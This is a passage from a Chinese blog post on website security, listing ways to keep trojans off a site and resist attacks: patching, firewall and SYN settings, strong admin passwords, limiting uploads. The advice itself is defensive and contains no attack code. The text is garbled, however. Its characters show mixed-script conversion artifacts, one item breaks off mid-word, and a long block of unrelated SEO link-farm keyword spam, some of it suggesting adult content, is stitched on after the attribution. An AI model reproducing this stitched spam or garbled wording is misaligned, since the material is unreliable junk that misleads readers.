          7) 修改默認(rèn)管理員用戶名,提高管理后臺的密碼強(qiáng)度,使用字母、數(shù)字以及特殊符號多種組合的密碼,并嚴(yán)格控制不同級別用戶的訪問權(quán)限。

          8) 選擇有實(shí)力保障的主機(jī)服務(wù)提供商。

          9) 關(guān)閉不必要的服務(wù),以及端口。

          10) 關(guān)閉或者限制不必要的上傳功能。

          11) 設(shè)置防火墻等安全措施。

          12) 若被黑問題反復(fù)出現(xiàn),建議重新安裝服務(wù)器操作系統(tǒng),并重新上傳備份的網(wǎng)站文件。

          般網(wǎng)站建設(shè)之后的話,沒有流量及PR值一般比較安全,一般網(wǎng)站權(quán)重大于等于2就會引來很多攻擊與雞翅,一旦可能出現(xiàn)的這幾種情況居多,網(wǎng)站被掛木馬,網(wǎng)站被黑,網(wǎng)站被攻擊這幾種情況。

          防掛馬方法:

          1、建議用戶通過ftp來上傳、維護(hù)網(wǎng)頁,不經(jīng)常使用盡量關(guān)閉盡量ftp端口,不安裝asp的上傳程序。

          2、定期對網(wǎng)站進(jìn)行安全的檢測,具體可以利用網(wǎng)上一些工具,如sinesafe網(wǎng)站掛馬檢測工具!

          3、asp程序管理員的用戶名和密碼要有一定復(fù)雜性,不能過于簡單,還要注意定期更換。

          4、到正規(guī)網(wǎng)站下載asp程序,下載后要對其數(shù)據(jù)庫名稱和存放路徑進(jìn)行修改,數(shù)據(jù)庫文件名稱也要有一定復(fù)雜性。

          5、要盡量保持程序是最新版本。

          6、不要在網(wǎng)頁上加注后臺管理程序登陸頁面的鏈接。

          7、為防止程序有未知漏洞,可以在維護(hù)后刪除后臺管理程序的登陸頁面,下次維護(hù)時再通過ftp上傳即可。

          8、要時常備份數(shù)據(jù)庫等重要文件。

          9、日常要多維護(hù),并注意空間中是否有來歷不明的asp文件。記住:一分汗水,換一分安全!

          10、一旦發(fā)現(xiàn)被入侵,除非自己能識別出所有木馬文件,否則要刪除所有文件。

          11、對asp上傳程序的調(diào)用一定要進(jìn)行身份認(rèn)證,并只允許信任的人使用上傳程序。這其中包括各種新聞發(fā)布、商城及論壇程

          網(wǎng)站防攻擊方法:

          1、確保服務(wù)器的系統(tǒng)文件是最新的版本,并及時更新系統(tǒng)補(bǔ)丁。

          2、關(guān)閉不必要的服務(wù)。

          3、限制同時打開的SYN半連接數(shù)目。

          4、縮短SYN半連接的time out 時間。

          5、正確設(shè)置防火墻 禁止對主機(jī)的非開放服務(wù)的訪問 限制特定IP地址的訪問 啟用防火墻的防DDoS的屬性 嚴(yán)格限制對外開放的服務(wù)器的向外訪問 運(yùn)行端口映射程序或端口掃描程序,要認(rèn)真檢查特權(quán)端口和非特權(quán)端口。

          6、認(rèn)真檢查網(wǎng)絡(luò)設(shè)備和主機(jī)/服務(wù)器系統(tǒng)的日志。只要日志出現(xiàn)漏洞或是時間變更,那這臺機(jī)器就可 能遭到了攻擊。

          7、限制在防火墻外與網(wǎng)絡(luò)文件共享。這樣會給黑客截取系統(tǒng)文件的機(jī)會,主機(jī)的信息暴露給黑客,無疑是給了對方入侵的機(jī)會。

          屬于商務(wù)網(wǎng)站的站友且沒有大量精力保障與維護(hù)網(wǎng)站安全的,盡量通過接入CDN、高防IP、防火墻等進(jìn)行網(wǎng)站安全維護(hù),本人沒有多余的錢來開通CDN、高防IP及阿里云的云騎士等產(chǎn)品,所以采用寶塔商業(yè)授權(quán)版的防火墻。對于低級攻擊一般是可以防護(hù)得住的。

          作者:lg3230

          來源:盧松松博客轉(zhuǎn)載請注明出處!

          本文地址:https://lusongsong.com/reed/14328.html


          主站蜘蛛池模板: 日韩三级一区二区| 无码国产伦一区二区三区视频| 国产在线精品观看一区| 激情啪啪精品一区二区| 精品国产鲁一鲁一区二区| 精品免费久久久久国产一区| 精品国产免费观看一区| 无码精品一区二区三区免费视频 | 无码囯产精品一区二区免费 | 国产日韩精品一区二区在线观看播放| 日本亚洲国产一区二区三区| 日本一区二区三区精品国产 | 日韩少妇无码一区二区三区| 亚洲丰满熟女一区二区哦| 精品永久久福利一区二区| 亚洲一区综合在线播放| 国产精品丝袜一区二区三区| 国产精品亚洲综合一区| 国产成人精品一区在线| av无码一区二区三区| 亚洲福利精品一区二区三区| 国产一区二区三区不卡在线观看| 国产精品久久久久一区二区三区| 亚洲av无码片区一区二区三区| 日韩精品乱码AV一区二区| 亚洲国产精品一区| 日韩精品中文字幕无码一区 | 在线精品视频一区二区| 99无码人妻一区二区三区免费| 国产91大片精品一区在线观看| 波多野结衣一区二区三区| 亚洲熟妇无码一区二区三区| 无码人妻啪啪一区二区| 日本在线电影一区二区三区 | 亚洲中文字幕一区精品自拍| 亚洲国产成人久久一区二区三区 | 精品一区高潮喷吹在线播放| 精品一区二区三区高清免费观看 | 亚洲熟女乱色一区二区三区| 亚洲国产一区二区a毛片| 农村乱人伦一区二区|